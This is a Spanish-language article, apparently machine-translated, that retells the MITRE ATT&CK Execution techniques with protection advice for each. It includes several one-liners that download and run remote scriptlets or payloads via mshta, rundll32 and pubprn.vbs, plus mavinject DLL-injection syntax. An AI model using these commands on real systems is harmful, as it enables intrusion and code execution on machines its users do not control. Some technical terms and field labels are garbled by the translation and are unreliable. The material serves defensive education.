Ejecución

Enlaces a todas las partes:
Parte 1. Obtención del acceso inicial (acceso inicial)
Parte 2. Ejecución
Parte 3. Fijación (persistencia)
Parte 4. Escalada de privilegios
Parte 5. Evasión de defensa
Parte 6. Obtención de credenciales (acceso de credenciales)
Parte 7. Descubrimiento
Parte 8. Movimiento lateral
Parte 9. Recolección de datos (Colección)
Parte 10 Exfiltración
Parte 11. Comando y Control

La fase de "Ejecución" describe el uso por los atacantes de los medios y métodos de ejecución remota y local en el sistema atacado de varios comandos, scripts y archivos ejecutables que se le entregaron en la etapa anterior.

El autor no es responsable de las posibles consecuencias de aplicar la información establecida en el artículo, y también se disculpa por posibles imprecisiones hechas en algunas formulaciones y términos. La información publicada es un recuento gratuito de los contenidos de MITER ATT & CK.

AppleScript

Sistema: macOS
Derechos: usuario
Descripción: el lenguaje AppleScript tiene la capacidad de funcionar con Apple Event: mensajes intercambiados entre aplicaciones como parte de la comunicación entre procesos (IPC). Con Apple Event, puede interactuar con casi cualquier aplicación que esté abierta localmente o remotamente, desencadenar eventos como abrir ventanas y presionar teclas. Los scripts se ejecutan con el comando: Osascript -e <script> .
Los atacantes pueden usar AppleScript para abrir de forma encubierta conexiones SSH a hosts remotos, dando a los usuarios diálogos falsos. AppleScript también se puede utilizar en tipos de ataques más comunes, como las organizaciones de Shell inverso.

Recomendaciones de protección: verificación obligatoria de la ejecución de scripts AppleScript para la firma de un desarrollador de confianza.

CMSTP (AppLocker ByPass - CMSTP)

Sistema: Windows
Derechos: usuario
Descripción: Microsoft Connection Manager Profile Installer (cmstp.exe) es la utilidad " Connection Manager Profile Installer " integrada en Windows. Cmstp.exe puede tomar un archivo inf como parámetro, por lo que un atacante podría preparar un INF malicioso especial para descargar y ejecutar archivos DLL o scriptlets (* .sct) desde servidores remotos sin pasar por AppLocker y otros bloqueos, porque cmstp.exe está firmado con un certificado digital de Microsoft.

Recomendaciones de protección: bloquear el lanzamiento de aplicaciones potencialmente peligrosas. Supervisión de inicios C: \ Windows \ System32 \ cmstp.exe .

Interfaz de línea de comandos

Sistema: Windows, Linux, macOS
Derechos: usuario, administrador, sistema
Descripción: puede interactuar con la interfaz de línea de comandos localmente, de forma remota a través de software de acceso remoto, utilizando Reverse Shell, etc. Los comandos se ejecutan con el nivel de permiso actual del proceso de la interfaz de línea de comandos, si el comando no incluye una llamada al proceso que cambia los permisos para ejecutar el comando (por ejemplo, una tarea programada).

Recomendaciones de seguridad: audite y / o bloquee la línea de comandos utilizando herramientas como AppLocker o políticas de restricción de software.

Elementos del panel de control

Sistema: Windows
Derechos: usuario, administrador, sistema
Descripción: La táctica es utilizar los elementos del Panel de control de Windows por parte de los atacantes para ejecutar comandos arbitrarios como carga útil (por ejemplo, el virus Reaver ). Los objetos maliciosos pueden disfrazarse como controles estándar y entregarse al sistema utilizando archivos adjuntos de phishing. Las utilidades para ver y configurar los ajustes de Windows son archivos exe registrados y archivos CPL de elementos del panel de control de Windows. Los archivos CPL en realidad son DLL renombrados que se pueden ejecutar de las siguientes maneras:

• directamente desde la línea de comando: control.exe <file.cpl> ;
• utilizando las funciones API de shell32.dll: rundll32.exe shell32.dll, Control_RunDLL <file.cpl> ;
• haga doble clic en el archivo cpl.

Las CPL registradas almacenadas en System32 se muestran automáticamente en el Panel de control de Windows y tienen un identificador único almacenado en el registro:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ ControlPanel \ NameSpace

La información sobre otras CPL, por ejemplo, el nombre para mostrar y la ruta al archivo cpl, se almacena en las secciones Cpl y Propiedades extendidas de la sección:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Panel de control

Algunas CPL lanzadas a través del shell se registran en la sección:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Controls Folder \ {name} \ shellex \ PropertySheetHandlers

Recomendación de protección: restrinja el inicio y el almacenamiento de archivos de elementos del panel de control solo en carpetas protegidas (por ejemplo, C: \ Windows \ System32 ), habilite el Control de cuentas de usuario (UAC) y AppLocker para evitar cambios no autorizados en el sistema. Por supuesto, el uso de software antivirus.

Protocolo de intercambio dinámico de datos (DDE), ejecución de código sin macro en MSWord

Sistema: Windows
Derechos: usuario
Descripción: DDE es un protocolo para la interacción de aplicaciones que comparten datos y memoria compartida para mensajería. Por ejemplo, un documento de Word puede contener una tabla que se actualiza automáticamente desde un documento de Excel. La técnica consiste en explotar una vulnerabilidad en las aplicaciones de MS Office relacionadas con el uso del protocolo DDE en MS Office. Los atacantes pueden incrustar objetos en documentos de MS Office que contienen comandos que se ejecutarán cuando se abra el documento. Por ejemplo, un documento de Word puede contener un objeto Field cuyo valor indica el comando {DDEAUTO <comando, por ejemplo, c: \ windows \ system32 \ cmd.exe>} , que se ejecutará cuando se abra el documento. A pesar de la pérdida de relevancia, DDE puede habilitarse, incluso en Windows 10 y MS Office 2016, utilizando la clave:
AllowDDE (DWORD) = 2 en la clave de registro:
HKEY_CURRENT_USER \ Software \ Microsoft \ Office \ <versión de Office> \ Word \ Security .

Recomendaciones de protección: siga las recomendaciones de Microsoft e instale la actualización adecuada de MS Office . En Windows 10, también puede habilitar el parámetro de reducción de superficie de ataque (ASR) para protegerse de los ataques DDE y los procesos secundarios de las aplicaciones de MS Office.

Ejecución a través de API

Sistema: Windows
Derechos: usuario, administrador, sistema
Descripción: los atacantes pueden usar la API para ejecutar archivos binarios. Las funciones de la API, como CreateProcess, permiten que los programas y los scripts inicien procesos al especificar las rutas y argumentos necesarios. Funciones de API que se pueden usar para ejecutar archivos binarios:

• CreateProcessA (), CreateProcessW ();
• CreateProcessAsUserA (), CreateProcessAsUserW ();
• CreateProcessInternalA (), CreateProcessInternalW ();
• CreateProcessWithLogonW (), CreateProcessWithTokenW ();
• LoadLibraryA (), LoadLibraryW ();
• LoadLibraryExA (), LoadLibraryExW ();
• LoadModule ();
• LoadPackagedLibrary ();
• WinExec ();
• ShellExecuteA (), ShellExecuteW ();
• ShellExecuteExA (), ShellExecuteExW ().

Recomendaciones de protección: las llamadas a funciones de API son una ocurrencia común que es difícil de distinguir de la actividad maliciosa. El vector de protección debe estar dirigido a prevenir el lanzamiento de las herramientas del atacante al comienzo de la cadena de ataque, detectar comportamientos maliciosos y bloquear software potencialmente peligroso.

Ejecución a través de carga de módulo

Sistema: Windows
Derechos: usuario
Descripción: es posible organizar la ejecución del código utilizando el cargador de módulos de Windows - NTDLL.dll, que puede cargar la biblioteca DLL en una ruta local o de red arbitraria. NTDLL.dll es parte de la API de Windows y puede invocar funciones como CreateProcess () y LoadLibrary () .

Recomendaciones de protección: las llamadas a funciones de API son funciones normales del sistema operativo que son difíciles de distinguir de la actividad maliciosa. El vector de protección debe estar dirigido a prevenir el lanzamiento de las herramientas del atacante al comienzo de la cadena de ataque. tiene sentido considerar limitar la carga de archivos DLL a los directorios% SystemRoot% y % ProgramFiles% .

Explotación para la ejecución del cliente

Sistema: Windows, Linux, macOS
Derechos: usuario
Descripción: la técnica implica la ejecución remota de código mediante exploits en el software del usuario. La presencia de vulnerabilidades en el software a menudo se asocia con la violación por parte de los desarrolladores de software de los requisitos de programación segura, lo que finalmente conduce a la posibilidad de causar un comportamiento inesperado del software.
Considere algunos tipos de exploits:

• Exploits exploits. Los navegadores web son el objetivo cuando los atacantes utilizan enlaces de carga de sombra y phishing. El sistema atacado puede verse comprometido a través de un navegador normal después de que el usuario realice ciertas acciones, por ejemplo, siguiendo el enlace especificado en el correo electrónico de phishing.
• Explotaciones de aplicaciones de Office. Los archivos maliciosos se transmiten como archivos adjuntos o enlaces de descarga. Para explotar la vulnerabilidad, el usuario debe abrir un documento o archivo para iniciar el exploit.
• Explotaciones de aplicaciones de terceros. Las aplicaciones comunes, como Adobe Reader y Flash, a menudo utilizadas en entornos corporativos, están dirigidas por ciberdelincuentes. Según el software y la naturaleza de la vulnerabilidad, las vulnerabilidades se explotan en un navegador o cuando un usuario abre un archivo, por ejemplo, los objetos Flash se pueden entregar en documentos de MS Office.

Recomendaciones de protección: instalación oportuna de actualizaciones para aplicaciones usadas. El uso de varios medios de aislamiento de aplicaciones potencialmente vulnerables: cajas de arena, herramientas de microsegmentación y virtualización, por ejemplo, Sandboxie para Windows y Apparmor, Docker para Linux. También se recomiendan los sistemas de protección contra exploits, como el Windows Defender Exploit Guard (WDEG) para Windows 10 o el Enhanced Mitigation Experience Toolkit (EMET) para versiones anteriores de Windows.

Interfaz gráfica de usuario

Sistema: Windows, Linux, macOS
Derechos: usuario, administrador, sistema
Descripción: se inicia un archivo ejecutable o script cuando interactúa con un archivo a través de una interfaz gráfica de usuario (GUI) en una sesión interactiva o remota, por ejemplo, a través del protocolo RDP.

Consejos de seguridad: proteja las credenciales que se pueden usar para conectarse de forma remota al sistema. Identifique utilidades innecesarias del sistema, software de terceros que se puede utilizar para ingresar al modo remoto interactivo.

InstallUtil

Sistema: Windows
Derechos: usuario
Descripción: InstallUtil es una utilidad de línea de comandos de Windows que puede instalar y desinstalar aplicaciones que cumplen con las especificaciones de .NET Framework. Installutil se instala automáticamente con VisualStudio. El archivo InstallUtil.exe está firmado por un certificado de Microsoft y se almacena en:
C: \ Windows \ Microsoft.NET \ Framework \ v [versión] \ InstallUtil.exe
Los atacantes pueden usar la funcionalidad InstallUtil para ejecutar el código proxy y omitir las listas blancas de aplicaciones.

Recomendaciones de protección: es posible que InstallUtil no se use en su sistema, por lo tanto, considere bloquear la instalación de InstallUtil.exe.

Controladores LSASS (controlador LSASS)

Sistema: Windows
Derechos: administrador, sistema
Descripción: Local Security Authority (LSA) es un subsistema de Windows que proporciona autenticación de usuario. El LSA incluye varias DLL dinámicas interconectadas que se ejecutan en el proceso LSASS.exe. Los atacantes pueden atacar LSASS.exe reemplazando o agregando controladores LSA ilegítimos y luego ejecutando código arbitrario. La técnica se implementa en el malware Pasam y Wingbird, que "arroja" las DLL modificadas utilizadas para cargar LSASS. En este caso, el código malicioso se ejecuta antes de que la DLL ilegítima cause un bloqueo y el posterior bloqueo del servicio LSASS.

Recomendaciones de protección: en Windows 8.1 y Windows Server 2012 R2, habilite la protección LSA configurando la clave de registro:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ RunAsPPL
al valor de dword: 00000001

Esta protección garantiza que los complementos y controladores cargados con LSA estén firmados digitalmente por Microsoft. En Windows 10 y Server 2016, habilite Credential Guard de Windows Defender para ejecutar lsass.exe en un entorno virtual aislado. Active el modo de búsqueda segura de DLL para reducir el riesgo de que las bibliotecas maliciosas se carguen en lsass.exe:
HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ Session Manager \ SafeDllSearchMode .

Launchctl

Sistema: macOS
Derechos: Usuario, Administrador
Descripción: Launchctl: una utilidad para administrar el servicio Launchd. Con Launchctl, puede administrar los servicios del sistema y del usuario (LaunchDeamons y LaunchAgents), así como ejecutar comandos y programas. Launchctl admite subcomandos de línea de comandos, interactivos o redirigidos desde la entrada estándar:
launchctl submit -l [nombre de etiqueta] - / Ruta / a / cosa / a / ejecutar '' arg "'' arg" '' arg " .
Al iniciar y reiniciar servicios y demonios, los atacantes pueden ejecutar código e incluso omitir la lista blanca si launchctl es un proceso autorizado; sin embargo, cargar, descargar y reiniciar servicios y demonios puede requerir privilegios elevados.

Recomendaciones de seguridad: limitar los derechos de los usuarios para crear Agentes de lanzamiento y lanzar Deamons de lanzamiento mediante la Política de grupo. Con la aplicación KnockKnock , puede descubrir programas que usan launchctl para administrar Agentes de lanzamiento y Deamons de lanzamiento.

Realizar con la programación de trabajo local

Sistema: Linux, macOS
Derechos: usuario, administrador, root
Descripción: los atacantes pueden crear tareas en los sistemas atacados para el lanzamiento no autorizado de programas cuando el sistema se inicia o de acuerdo con un cronograma. Los sistemas Linux y Apple admiten varios métodos para programar el lanzamiento de tareas periódicas en segundo plano: cron, at, launchd. A diferencia del Programador de tareas de Windows, la programación de tareas en sistemas Linux no se puede hacer de forma remota, excepto para usar sesiones remotas como SSH.

Recomendaciones de protección: limitar los derechos de los usuarios para crear tareas programadas, bloquear las utilidades del sistema y otro software que se puede usar para programar tareas.

Mshta

Sistema: Windows
Derechos: usuario
Descripción: Mshta.exe (ubicado en C: \ Windows \ System32 \ ) es una utilidad que ejecuta aplicaciones HTML de Microsoft (* .HTA). Las aplicaciones HTA se ejecutan usando las mismas tecnologías que usa InternetExplorer, pero fuera del navegador. Debido al hecho de que Mshta procesa archivos sin pasar por la configuración de seguridad del navegador, los atacantes pueden usar mshta.exe para representar la ejecución de archivos HTA maliciosos, Javascript o VBScript. El archivo malicioso se puede iniciar mediante el script incorporado:
mshta vbscript: Close (Execute ("GetObject (" "script: https [:] // webserver / payload [.] sct" ")")))

o directamente, en la URL:
mshta http [:] // servidor web / carga útil [.] hta

Recomendaciones de protección: la funcionalidad de mshta.exe está asociada con versiones anteriores de IE que han llegado al final de su ciclo de vida. Bloquee Mshta.exe si no está utilizando su funcionalidad.

Powerhell

Sistema: Windows
Derechos: Usuario, Administrador
Descripción: PowerShell (PS) es una potente interfaz de línea de comandos interactiva y un entorno de secuencias de comandos incluido con Windows. Los atacantes pueden usar PS para recopilar información y ejecutar código. Por ejemplo, el cmdlet Start-Process puede ejecutar un archivo ejecutable; el cmdlet Invoke-Command ejecutará el comando localmente o en una computadora remota. PS también se puede utilizar para descargar y ejecutar archivos ejecutables desde Internet, sin guardarlos en su disco duro. Para conexiones remotas con PS, necesita derechos de administrador. Hay varias herramientas para atacar PS:

• Imperio
• Powersploit
• PSAttack

Recomendaciones de protección: el PS se puede eliminar del sistema si no es necesario. Si se requiere PS, los administradores deben limitarse a ejecutarlo solo ejecutando scripts firmados. Deshabilite el servicio WinRM para evitar la ejecución remota de scripts PS. Cabe señalar que existen métodos para evitar las políticas de ejecución de script PS .

Regsvcs / regasm

Sistema: Windows
Derechos: Usuario, Administrador
Descripción: Regsvcs y Regasm son utilidades de utilidades de Windows que se utilizan para registrarse con el sistema de ensamblaje de .NET Component Object Model (COM). Ambos archivos están firmados digitalmente por Microsoft. Los atacantes pueden usar Regsvcs y Regasm para ejecutar el código proxy cuando el atributo es el código que debe ejecutarse antes de registrar o cancelar el registro: [ComRegisterFunction] o [ComUnregisterFunction]. El código con tales atributos se puede iniciar incluso si el proceso se ejecuta con privilegios insuficientes o incluso se bloquea al inicio.

Recomendaciones de protección: Bloquee Regsvcs.exe y Regasm.exe si no se utilizan en su sistema o red.

Regsvr32 (Squiblydoo)

Sistema: Windows
Derechos: Usuario, Administrador
Descripción: Regsvr32.exe es una utilidad de consola para registrar y anular el registro de controles OLE, como ActiveX y DLL, en el registro. Regsvr32.exe está firmado digitalmente por Microsoft y se puede usar para ejecutar el código proxy. Por ejemplo, usando Regsvr32, puede descargar un archivo XML que contiene partes de código Java (scriptlets) que omitirá la lista blanca.

Recomendaciones de protección: la Reducción de superficie de ataque (ASR) en EMET y Advanced Theart Protection en Windows Defender pueden bloquear el uso de Regsvr32.exe para omitir las listas blancas.

Rundll32 (Poweliks)

Sistema: Windows
Derechos: usuario
Descripción: Rundll32.exe es una utilidad del sistema para iniciar programas ubicados en bibliotecas conectadas dinámicamente a las que se puede llamar para proxy del archivo binario, ejecutar archivos de control de Windows (.cpl) a través de las funciones de Shel32.dll no documentadas: Control_RunDLL y Control_RunDLLAsUser . Al hacer doble clic en el archivo .cpl también se ejecuta Rundll32.exe. Rundll32 también se puede usar para ejecutar scripts como JavaScript:
rundll32.exe javascript: "\ .. \ mshtml, RunHTMLApplication"; document.write (); GetObject ("scrirpt: https [:] // www [.] example [.] com / malware.sct") "
El método anterior de usar rundll32.exe es detectado por un software antivirus como un virus como Poweliks.
Recomendaciones de protección: Attack Surface Reduction (ASR) en EMET y Advanced Theart Protection en Windows Defender pueden bloquear el uso de Rundll32.exe para omitir las listas blancas.

Ejecutando la tarea programada de Windows

Sistema: Windows
Derechos: usuario, administrador, sistema
Descripción: Utilidades como at, schtasks y Windows Task Scheduler se pueden usar para programar programas y scripts para que se ejecuten en una fecha y hora específicas. Se puede programar una tarea en un sistema remoto, siempre que se use RPC para la autenticación y la impresora y el uso compartido de archivos esté habilitado. Además, se requieren derechos de administrador para programar tareas en un sistema remoto. Los atacantes pueden usar la programación remota de tareas para ejecutar programas al inicio del sistema o en el contexto de una cuenta específica.

Recomendaciones de protección: active la restricción de derechos para crear tareas para los usuarios en nombre del sistema en el registro:
HKLM \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ SubmitControl = 0
Nota:SubmitControl = 1, permite a los miembros del grupo Operadores del servidor crear trabajos.

Además, configure el GPO apropiado:
Configuración del equipo> [Políticas]> Configuración de Windows> Configuración de seguridad> Políticas locales> Opciones de seguridad: Controlador de dominio: Permitir a los operadores del servidor programar tareas:
Configuración del equipo deshabilitada > [Políticas]> Configuración de Windows> Configuración de seguridad> Local Políticas> Asignación de derechos de usuario: Aumente la prioridad de programación
Considere usar el Marco de PowerSploit, que contiene el módulo PowerUP para encontrar vulnerabilidades en la resolución de tareas programadas, en su actividad.

Scripting

Sistema: Windows, Linux, macOS
Derechos:
Descripción del usuario : los atacantes pueden usar secuencias de comandos para automatizar sus acciones, acelerar las tareas operativas y, como resultado, reducir el tiempo necesario para obtener acceso. Algunos lenguajes de secuencias de comandos se pueden utilizar para omitir los mecanismos de monitoreo de procesos al interactuar directamente con el sistema operativo a nivel de API en lugar de llamar a otros programas. Los scripts se pueden incrustar en documentos de Office como macros y luego usarse para ataques de phishing. En este caso, los atacantes esperan que el usuario ejecute el archivo macro o que el usuario acepte activar la macro. Existen varios marcos populares para implementar secuencias de comandos: Metasploit, Veil, PowerSploit.

Consejos de seguridad: limite el acceso a scripts como VBScript o PowerShell. En Windows, configure los ajustes de seguridad de MS Office habilitando la visualización segura y la prohibición de macros a través de GPO. Si se necesitan macros, solo permita que se ejecuten macros confiables firmadas digitalmente. Utilice la microsegmentación y la virtualización de aplicaciones, por ejemplo, Sandboxie para Windows y Apparmor, Docker para Linux.

Inicio de servicios (ejecución de servicios)

Sistema:
Derechos de Windows : Administrador,
Descripción del sistema : los atacantes pueden ejecutar un código binario, un comando o una secuencia de comandos utilizando métodos especiales de interacción con los servicios de Windows, por ejemplo, utilizando el Administrador de control de servicios (SCM), puede crear nuevos servicios y modificar los que se están ejecutando.

Recomendaciones de protección:Asegúrese de que la configuración actual de privilegios en el sistema prohíba el lanzamiento de servicios con privilegios altos por parte de usuarios con privilegios bajos. Asegúrese de que los archivos ejecutables con permisos elevados en el sistema no puedan ser reemplazados o modificados por usuarios con permisos más bajos. Considere el uso de herramientas para restringir el lanzamiento de programas potencialmente peligrosos con AppLocker y configure las Políticas de restricción de software .

Ejecución mediante ejecución de proxy binario firmado

Sistema:
Derechos de Windows :
Descripción del usuario : Los archivos binarios firmados con certificados digitales confiables se pueden ejecutar en sistemas Windows que están protegidos por verificación de firma digital. Se pueden usar varios archivos de Microsoft firmados de manera predeterminada durante la instalación de Windows para representar el inicio de otros archivos:
Mavinject.exe es una utilidad de Windows que permite ejecutar código. Mavinject se puede usar para ingresar la DLL en el proceso de ejecución:
"C: \ Archivos de programa \ Archivos comunes \ microsoft shared \ ClickToRun \ MavInject32.exe" [PID] / INJECTRUNNING [PATH DLL]
C: \ Windows \ system32 \ mavinject.exe [PID ] / INJECTRUNNING [RUTA DLL]
SyncAppvPublishingServer.exe- se puede usar para ejecutar scripts de powershell sin ejecutar powershell.exe.
Hay varios binarios más similares .

Recomendaciones de protección: es posible que no se utilicen muchos archivos firmados en su sistema, por lo tanto, considere bloquear su inicio.

Ejecución a través de secuencias de comandos firmadas (Ejecución de proxy de secuencias de comandos firmadas)

Sistema:
Derechos de Windows :
Descripción de los usuarios : las secuencias de comandos firmadas con certificados de confianza se pueden usar para representar archivos maliciosos, por ejemplo, PubPrn.vbs se firma con un certificado de Microsoft y se puede usar para ejecutar un archivo desde un servidor remoto:
cscript C: \ Windows \ System32 \ Printing_Admin_Scripts \ script ru-RU \ pubprn.vbs 127.0.0.1: http [:] // 192.168.1.100/hi.png

Recomendaciones de protección: Es posible que dichos scripts firmados no sean necesarios en su sistema, por lo tanto, considere bloquear su inicio.

Equipo fuente

Sistema: Linux y macOS
Derechos:
Descripción del usuario : Fuente: un comando que le permite leer y ejecutar todos los comandos del archivo especificado en el shell de comandos actual, lo que significa que todas las variables de entorno especificadas serán visibles en todos los scripts y comandos que se iniciarán. La fuente se puede iniciar de dos maneras:
fuente / ruta / a / nombre de archivo [argumentos] o . / ruta / a / nombre de archivo [argumentos]
Tenga en cuenta el espacio después del punto. Sin un espacio, el programa se lanzará en un nuevo shell de comandos. Los atacantes pueden usar Source para ejecutar archivos no marcados con la marca "x" como archivos ejecutables.

Recomendaciones de protección: Para evitar el uso de comandos incorporados en el sistema es bastante difícil debido a su legalidad, por lo tanto, el vector de protección debe estar dirigido a prevenir acciones maliciosas en las primeras etapas del ataque, por ejemplo, en la etapa de entrega o creación de un archivo malicioso en el sistema.

Espacio después del nombre de archivo

Sistema: Linux, macOS
Derechos: Descripción del usuario
:Los atacantes pueden ocultar el verdadero tipo de un archivo cambiando su extensión. Para ciertos tipos de archivos (no funciona con archivos .app), agregar un carácter de espacio al final del nombre del archivo cambiará la forma en que el sistema operativo procesa el archivo. Por ejemplo, si hay un archivo ejecutable Mach-O con el nombre evil.bin, cuando el usuario hace doble clic, el sistema operativo iniciará Terminal.app y lo ejecutará. Si se cambia el nombre del mismo archivo a evil.txt, con un doble clic comenzará en un editor de texto. Sin embargo, si se cambia el nombre del archivo a "evil.txt" (un espacio al final), al hacer doble clic en el tipo del archivo verdadero, se determinará el sistema operativo y se iniciará el archivo binario. Los atacantes pueden usar esta técnica para engañar a un usuario para que inicie un archivo ejecutable malicioso.

Recomendaciones de protección:El uso de esta técnica es difícil de prevenir porque un atacante utiliza mecanismos operativos estándar del sistema operativo, por lo que el vector de protección debe estar dirigido a prevenir acciones maliciosas en las primeras etapas del ataque, por ejemplo, en la etapa de entrega o creación de un archivo malicioso en el sistema.

Ejecución con software de administración de red de terceros (software de terceros)

Sistema: Windows, Linux, macOS
Derechos: Usuario, administrador,
Descripción del sistema : El vector de ataque está dirigido a software de terceros y sistemas de implementación de software que se utilizan en la red atacada con fines administrativos (SCCM, VNC, HBSS, Altris, etc.). Si un atacante obtiene acceso a dichos sistemas, el adversario puede ejecutar código de forma remota en todos los hosts conectados al sistema de implementación de software. Los derechos necesarios para implementar esta técnica dependen de la configuración particular del sistema. Las credenciales locales pueden ser suficientes para acceder al servidor de implementación de software; sin embargo, se puede requerir una cuenta de administrador para iniciar la implementación del software.

Recomendaciones de protección:Verifique el nivel de seguridad de sus sistemas de implementación de software. Asegúrese de que el acceso a los sistemas de gestión de software sea limitado, controlado y protegido. Utilice estrictamente las políticas obligatorias de aprobación previa para la implementación remota de software. Proporcione acceso a los sistemas de implementación de software a un número limitado de administradores, garantice el aislamiento del sistema de implementación de software. Asegúrese de que las credenciales para acceder al sistema de implementación de software sean únicas y no se utilicen en otros servicios en la red corporativa. Si el sistema de implementación de software está configurado para ejecutar solo archivos binarios firmados, verifique que los certificados de confianza no estén almacenados en el sistema de implementación de software en sí, sino que estén ubicados en un sistema al que no se pueda acceder de forma remota.

Equipo trampa

Sistema: Linux, macOS
Derechos: Usuario, administrador
Descripción: El comando trap protege el script de interrupciones (ctrl + c, ctrl + d, ctrl + z, etc.). Si el script recibe una señal de interrupción especificada en los argumentos del comando trap, procesa la señal de interrupción por sí sola, mientras que el shell no procesará dicha señal. Los atacantes pueden usar trap para registrar el código que se ejecutará cuando el shell reciba ciertas señales de interrupción.

Recomendaciones de protección:El uso de esta técnica es difícil de prevenir, porque el atacante utiliza los mecanismos estándar del sistema operativo. El vector de protección debe estar dirigido a prevenir acciones maliciosas en las primeras etapas del ataque, por ejemplo, en la etapa de entrega o creación de un archivo malicioso en el sistema.

Ejecutar a través de Trusted Developer Utilities

Sistema:
Derechos de Windows :
Descripción del usuario : Hay muchas utilidades que usan los desarrolladores de software y que se pueden usar para ejecutar código de varias formas en el desarrollo, la depuración y la ingeniería inversa del software. Estas utilidades a menudo se firman con certificados digitales que les permiten proxy de código malicioso en el sistema operativo, evitando los mecanismos de seguridad y las hojas blancas de las aplicaciones.

MsbulidEs una plataforma de desarrollo de software utilizada en Visual Studio. Utiliza proyectos en forma de archivos XML que describen los requisitos para construir varias plataformas y configuraciones. MSBuild de .NET versión 4 le permite insertar código C # en un proyecto XML, compilarlo y luego ejecutarlo. MSBulid.exe está firmado por Microsoft Digital Certificate.
DNX : .Net Execution Environmant (dnx.exe) es un kit de desarrollo para Visual Studio Enterprise. Descontinuado desde .NET Core CLI en 2016. Falta DNX en las compilaciones estándar de Windows y solo puede estar presente en los hosts de desarrollador cuando se utiliza .Net Core y ASP.NET Core 1.0. Dnx.exe está firmado digitalmente y se puede usar para ejecutar código proxy.
RCSI- interfaz de línea de comandos no interactiva para C #, similar a csi.exe. Fue introducido en una versión anterior de la plataforma compiladora Roslyn .Net. Rcsi.exe está firmado por Microsoft Digital Certificate. Los archivos de script C # .csx se pueden escribir y ejecutar usando Rcsi.exe en el símbolo del sistema de Windows.
WinDbg / CDB es el kernel de MS Windows y una utilidad para depurar en modo de usuario. El depurador de consola de Microsoft cdb.exe también es un depurador en modo de usuario. Ambas utilidades se pueden usar como herramientas independientes. Comúnmente utilizado en el desarrollo de software, ingeniería inversa, y no se puede encontrar en los sistemas normales de Windows. Los archivos WinDbg.exe y CDB.exe están firmados por Microsoft Digital Certificate y pueden utilizarse para codificar el proxy.
Rastreador- utilidad de seguimiento de archivos tracker.exe. Incluido en .NET como parte de MSBuild. Se usa para registrar llamadas en el sistema de archivos de Windows 10. Los atacantes pueden usar tracker.exe para ejecutar DLL en varios procesos. Tracker.exe también está firmado con un certificado de Microsoft.

Recomendaciones de protección: todos los archivos anteriores deben eliminarse del sistema si los usuarios no los utilizan para el fin previsto.

Ejecución de usuario

Sistema: Windows, Linux, macOS
Derechos:
Descripción del usuario : Los atacantes pueden contar con ciertas acciones del usuario para realizar ciertas acciones. Esto puede ser una ejecución directa de código cuando un usuario abre un archivo ejecutable malicioso entregado como un archivo adjunto de phishing con un icono y una extensión de archivo de documento visible. A veces, se pueden usar otras técnicas, por ejemplo, cuando un usuario hace clic en un enlace en un correo electrónico de phishing, lo que conduce a la explotación de una vulnerabilidad del navegador. La técnica de "ejecución del usuario" se usa a menudo en otras etapas de la invasión, por ejemplo, cuando un atacante coloca un archivo en un directorio compartido o en el escritorio del usuario, con la esperanza de que "haga clic" en él.

Consejos de protección: aumentar la conciencia del usuario. Bloquear la descarga de archivos como .scr, .exe, .pif, .cpl, etc. El uso de software antivirus y la implementación de sistemas IPS.

Instrumental de administración de Windows (WMI)

Sistema:
Derechos de Windows : Usuario, Administrador
Descripción: WMI es una herramienta para administrar Windows, que proporciona acceso local y remoto a los componentes del sistema de Windows. WMI usa SMB y RPCS (se ejecuta en el puerto 135). Los atacantes pueden usar WMI para interactuar con sistemas locales y remotos, y también como un medio para realizar muchas operaciones tácticas, como recopilar información en la etapa de revisión de recursos (descubrimiento) y ejecución remota de archivos durante el "movimiento literal".

Recomendaciones de protección:Deshabilitar WMI y RPCS puede conducir a la inestabilidad del sistema. Por defecto, solo los administradores pueden conectarse remotamente al sistema a través de WMI. Evite la duplicación de privilegios entre cuentas administrativas y otras cuentas privilegiadas.

Administración remota de Windows (WinRM)

Sistema:
Derechos de Windows : Usuario, administrador
Descripción: Administración Remota de Windows (WinRM) es el nombre de un servicio y protocolo que permite la interacción remota del usuario con el sistema (por ejemplo, iniciar un archivo, cambiar el registro, cambiar un servicio. Para comenzar, use el comando winrm y otros programas ., como PowerShell

Indicaciones para la protección: Desactivar el servicio WinRM si es necesario, WinRM infraestructura de aislar con cuentas y el permiso debe ser separados .. recomendaciones WINRM sobre la configuración y el uso de métodos de autenticación randmauerov anfitrión para permitir el acceso a WinRM solamente con ciertos dispositivos.